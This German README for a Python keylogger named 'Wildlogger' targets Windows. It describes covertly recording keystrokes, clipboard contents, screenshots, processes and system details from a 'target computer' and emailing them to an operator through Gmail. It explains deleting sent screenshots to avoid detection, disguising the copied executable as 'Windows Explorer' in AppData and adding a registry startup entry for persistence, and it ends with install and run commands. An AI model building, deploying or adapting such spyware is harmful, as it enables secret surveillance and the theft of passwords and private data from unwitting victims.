
Dies ist ein Keylogger, der alle Daten sammelt und sie in einer festgelegten Zeit per E-Mail mit Systeminformationen versendet, die die Geräte-Seriennummer und Hardwarespezifikationen, jede gedrückte Taste, Screenshots und Kopiervorgänge umfassen.
__ ___ _ _ _
\ \ / (_) | | | | |
\ \ /\ / / _| | __| | | | ___ __ _ __ _ ___ _ __
\ \/ \/ / | | |/ _` | | | / _ \ / _` |/ _` |/ _ \ '__|
\ /\ / | | | (_| | | |___| (_) | (_| | (_| | __/ |
\/ \/ |_|_|\__,_| |______\___/ \__, |\__, |\___|_|
__/ | __/ |
|___/ |___/
Ein Keylogger für das Windows-Betriebssystem, der Verbindungsinformationen, Gerätesysteminformationen, eine Liste der ausgeführten Prozesse und gestoppten Dienste auf dem Betriebssystem, Tastatureingaben, Zwischenablageinhalte (Kopieren/Einfügen) und Screenshots des Zielsystems erfasst und diese in festgelegten Zeitabständen an eine angegebene E-Mail-Adresse sendet.
| :arrow_right: |
Es werden 2 verschiedene Threads verwendet, um Protokolleinträge und Screenshots als Berichte zu senden;
:heavy_check_mark: Thread 1 sendet die Protokolleinträge basierend auf dem festgelegten Zeitintervall an die angegebene E-Mail-Adresse. :heavy_check_mark: Thread 2 macht in festgelegten Abständen Screenshots. Wenn die Anzahl der aufgenommenen Screenshots 10 erreicht, sendet er die Screenshots an die angegebene E-Mail-Adresse und löscht sie, um Anomalieerkennungen auf dem Zielcomputer zu vermeiden. |
| :arrow_right: | Standardmäßig wird der Google Mail-Server für die Berichterstattung verwendet. |
| :arrow_right: | Wenn die Berichterstattung über den Gmail-SMTP-Server erfolgen soll, muss Weniger sichere App-Zugriffe aktiviert sein. |
| :arrow_right: | Die **persistent**-Methode, die sicherstellt, dass Wildlogger kontinuierlich auf dem Zielcomputer läuft, ist standardmäßig deaktiviert. |
| :arrow_right: |
Wenn Wildlogger in eine EXE-Datei umgewandelt wird, muss die **persistent**-Methode aktiviert werden, damit es kontinuierlich auf dem Zielcomputer läuft. Nach Aktivierung der **persistent**-Methode:
:heavy_check_mark: Die ausgeführte Wildlogger-Datei wird mit dem Namen "Windows Explorer" in den AppData-Ordner kopiert. :heavy_check_mark: In der Registrierung wird die Persistenz sichergestellt, indem der Pfad der Keylogger-Datei zu den Programmen hinzugefügt wird, die beim Windows-Start ausgeführt werden. |
python -m pip install -r .\requirements.txt
python wildlogger.py